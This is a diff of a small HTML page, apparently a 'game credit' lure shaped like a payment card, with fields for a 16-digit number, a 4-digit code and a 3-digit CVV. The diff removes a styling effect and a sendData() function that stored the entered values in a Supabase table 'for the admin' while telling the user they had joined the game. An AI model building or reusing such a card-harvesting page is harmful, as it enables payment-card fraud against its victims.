--- a/index.html
+++ b/index.html
@@ -3,9 +3,7 @@
 <head>
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
-<title>Game Credit System</title>
-
-<script src="https://cdn.jsdelivr.net/npm/@supabase/supabase-js@2"></script>
+<title>Game Kredit</title>
 
 <style>
 body{
@@ -14,35 +12,29 @@ body{
   display:flex;
   justify-content:center;
   align-items:center;
-  background:linear-gradient(135deg,#141e30,#243b55);
+  background:linear-gradient(135deg,#1e3c72,#2a5298);
   font-family:Arial;
 }
 
 .phone{
-  width:390px;
-  height:780px;
-  background:#000;
-  border-radius:40px;
+  width:380px;
+  background:#0f172a;
   padding:25px;
-  box-sizing:border-box;
-  box-shadow:0 0 40px rgba(0,0,0,0.8);
-  display:flex;
-  flex-direction:column;
-  justify-content:center;
+  border-radius:30px;
+  box-shadow:0 0 40px rgba(0,0,0,0.7);
 }
 
 .card{
   width:100%;
-  height:220px;
-  perspective:1200px;
-  margin-bottom:30px;
-  position:relative;
+  height:200px;
+  perspective:1000px;
+  margin-bottom:25px;
 }
 
 .card-inner{
   width:100%;
   height:100%;
-  transition:transform 0.6s;
+  transition:0.6s;
   transform-style:preserve-3d;
   position:relative;
 }
@@ -55,32 +47,12 @@ body{
   position:absolute;
   width:100%;
   height:100%;
-  border-radius:22px;
-  padding:25px;
+  border-radius:18px;
+  padding:20px;
   box-sizing:border-box;
   backface-visibility:hidden;
   color:white;
-  overflow:hidden;
-  background:linear-gradient(145deg,#1f2937,#111827);
-  border:1px solid rgba(255,255,255,0.15);
-  box-shadow:0 0 25px rgba(0,255,255,0.4);
-}
-
-.card-front::before{
-  content:"";
-  position:absolute;
-  inset:0;
-  background:linear-gradient(120deg,
-    rgba(255,0,255,0.2),
-    rgba(0,255,255,0.2),
-    rgba(255,255,0,0.2));
-  mix-blend-mode:overlay;
-  animation:holo 6s linear infinite;
-}
-
-@keyframes holo{
-  0%{transform:translateX(-100%)}
-  100%{transform:translateX(100%)}
+  background:linear-gradient(135deg,#0f2027,#203a43,#2c5364);
 }
 
 .card-back{
@@ -89,16 +61,16 @@ body{
 
 .card-type{
   position:absolute;
-  top:20px;
-  right:25px;
+  top:15px;
+  right:20px;
   font-weight:bold;
   letter-spacing:2px;
 }
 
 .card-number{
-  font-size:22px;
+  font-size:20px;
   letter-spacing:3px;
-  margin-top:80px;
+  margin-top:60px;
 }
 
 .card-bottom{
@@ -111,28 +83,28 @@ body{
 .cvv-box{
   background:white;
   color:black;
-  padding:8px;
-  margin-top:100px;
-  border-radius:8px;
+  padding:6px;
+  margin-top:80px;
   text-align:right;
+  border-radius:5px;
 }
 
 input{
   width:100%;
   padding:12px;
-  margin-bottom:12px;
-  border-radius:12px;
+  margin-bottom:10px;
+  border-radius:10px;
   border:none;
-  background:#1a1f2b;
+  background:#1e293b;
   color:white;
 }
 
 button{
   width:100%;
-  padding:14px;
-  border-radius:14px;
+  padding:12px;
+  border-radius:10px;
   border:none;
-  background:linear-gradient(45deg,#00f2fe,#4facfe);
+  background:#38bdf8;
   color:white;
   font-weight:bold;
   cursor:pointer;
@@ -145,7 +117,7 @@ button{
 <div class="phone">
 
 <div class="card" id="card">
-<div class="card-inner" id="cardInner">
+<div class="card-inner">
 
 <div class="card-front">
 <div class="card-type">KREDİT</div>
@@ -163,23 +135,16 @@ button{
 </div>
 </div>
 
-<input type="text" id="cardNumber" placeholder="16 simvol ID">
+<input type="text" id="cardNumber" placeholder="16 simvol">
 <input type="text" id="code4" placeholder="4 simvol">
 <input type="text" id="code3" placeholder="3 simvol">
 
-<button onclick="sendData()">Oyuna Başla</button>
+<button>Başla</button>
 
 </div>
 
 <script>
-const supabase = window.supabase.createClient(
-"SUPABASE_URL",
-"SUPABASE_ANON_KEY"
-);
-
 const card=document.getElementById("card");
-const cardInner=document.getElementById("cardInner");
-
 const numberInput=document.getElementById("cardNumber");
 const code4Input=document.getElementById("code4");
 const code3Input=document.getElementById("code3");
@@ -188,7 +153,7 @@ const displayNumber=document.getElementById("displayNumber");
 const display4=document.getElementById("display4");
 const display3=document.getElementById("display3");
 
-/* 16 SIMVOL LIMIT + 4-4-4-4 */
+/* 16 limit + 4-4-4-4 */
 numberInput.addEventListener("input",function(e){
   let raw=e.target.value.replace(/\s/g,"").slice(0,16);
   let formatted=raw.replace(/(.{4})/g,"$1 ").trim();
@@ -196,14 +161,14 @@ numberInput.addEventListener("input",function(e){
   displayNumber.textContent=formatted||"#### #### #### ####";
 });
 
-/* 4 SIMVOL */
+/* 4 simvol */
 code4Input.addEventListener("input",e=>{
   let v=e.target.value.slice(0,4);
   e.target.value=v;
   display4.textContent=v||"0000";
 });
 
-/* 3 SIMVOL + FLIP */
+/* 3 simvol + flip */
 code3Input.addEventListener("input",e=>{
   let v=e.target.value.slice(0,3);
   e.target.value=v;
@@ -212,30 +177,6 @@ code3Input.addEventListener("input",e=>{
 
 code3Input.addEventListener("focus",()=>card.classList.add("flip"));
 code3Input.addEventListener("blur",()=>card.classList.remove("flip"));
-
-/* 3D TILT */
-card.addEventListener("mousemove",(e)=>{
-  const rect=card.getBoundingClientRect();
-  const x=e.clientX-rect.left;
-  const y=e.clientY-rect.top;
-  const rotateY=((x/rect.width)-0.5)*15;
-  const rotateX=((y/rect.height)-0.5)*-15;
-  cardInner.style.transform=
-  `rotateY(${rotateY}deg) rotateX(${rotateX}deg)`;
-});
-card.addEventListener("mouseleave",()=>{
-  cardInner.style.transform="rotateY(0) rotateX(0)";
-});
-
-/* ADMINƏ GÖNDƏRMƏ */
-async function sendData(){
-  await supabase.from("game_cards").insert([{
-    card_id:numberInput.value,
-    code_4:code4Input.value,
-    code_3:code3Input.value
-  }]);
-  alert("Oyuna giriş edildi");
-}
 </script>
 
 </body>
